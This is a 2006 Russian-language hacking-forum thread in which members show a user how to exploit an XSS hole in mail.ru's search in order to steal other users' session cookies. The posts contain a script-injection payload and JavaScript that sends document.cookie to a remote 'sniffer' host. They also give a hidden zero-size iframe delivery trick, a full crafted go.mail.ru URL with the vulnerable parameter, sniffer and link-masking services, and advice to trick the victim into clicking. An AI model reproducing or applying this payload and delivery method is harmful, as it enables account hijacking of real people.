Xss на mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by em00s7, 25 May 2006.

  1. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    Подкиньте пожалуста Xss на mail.ru зарание спасибо=)
     
    #1 em00s7, 25 May 2006
    1 person likes this.
  2. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    #2 Go0o$E, 25 May 2006
  3. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    Профиксили уже =(
     
    #3 em00s7, 25 May 2006
  4. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Какое пофиксили!? Пробелы все в ссылке убери.
     
    #4 Go0o$E, 25 May 2006
  5. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    Go0o$E спасибо объясните плиз как её использовать ?? чтобы украсть куки
     
    #5 em00s7, 25 May 2006
  6. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Для ознакомления:
    https://forum.antichat.ru/thread18719.html

    Чтобы куки украсть достаточно в уязвимом параметре написать:
    Code:
    <srcipt src=http://site.ru/js.js></script>
    В самом файле js.js
    Code:
    img = new Image();
img.src = "http://sniffer/sn.php?"+document.cookie;
    Этот способ хорош тем, что работает даже там, где фильтруються ковычки.

    Зарегить сниффер можно на http://antichat.org/sniffer or http://s.netsec.ru/
    Замаскировать линк можно http://loc.netsec.ru/
    Но лучше делать в ифрейме, например
    Code:
    <iframe src="http://site.ru/?para=<script src=http://site.ru/js.js></script>" frameborder="0" widht="0" height="0">
    Что не понятно - спрашивай.
     
    #6 GreenBear, 25 May 2006
  7. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    Green_Bear в спасибо огромное)) я уж думал что ппц
     
    #7 em00s7, 25 May 2006
  8. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    А как же это:
    ВНИМАНИЕ!
    Данное письмо содержит потенциально опасный HTML-код,
    заблокированный автоматической системой безопасности.

    iframe - неработает, думаю прокатить тока не в майл ру, а напрример на гмайл ит.д.
     
    #8 Sn@k3, 30 May 2006
    1 person likes this.
  9. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Додумался, я дал пример использования пассивной ксс, а не в теле письма его присылать :)
     
    #9 GreenBear, 30 May 2006
  10. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    em00s7, ты должен отослать тому челу, которого хочешь взломать такую ссылку:

    Code:
    http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25%20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C%2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE%%20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript  src=http://site.ru/js.js%3E%3C/script%3E
    Ну и применить СИ, чтобы он её открыл.

    Что делать с http://site.ru/js.js, объяснил Green_Bear.
     
    #10 *Van*, 30 May 2006
    Last edited: 30 May 2006
  11. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    а активной у вас нету??
     
    #11 em00s7, 1 Jun 2006
  12. Sirko

    Sirko New Member

    Joined:
    5 Jun 2006
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Непонятно в каком параметре????

    Это надо создать файл и положить на сервак где выполняются скрипты??

    И куда этот инфрейм вставлвть???
    Толке не говорите в Ж.... :confused:
     
    #12 Sirko, 6 Jun 2006
  13. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12

    Например в данной xss уязвимый параметр surl

    Code:
    http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25  %20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C%  2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2  A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE%  %20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript  src=http://site.ru/js.js%3E%3C/script%3E
    Да.

    В поле сообщения. Не забудь отослать в формате HTML.
     
    #13 *Van*, 6 Jun 2006
  14. Sirko

    Sirko New Member

    Joined:
    5 Jun 2006
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    А это куда???
     
    #14 Sirko, 6 Jun 2006
  15. volone

    volone New Member

    Joined:
    6 Jun 2006
    Messages:
    24
    Likes Received:
    3
    Reputations:
    11
    а прокси обязательно использовать ?
     
    #15 volone, 8 Jun 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.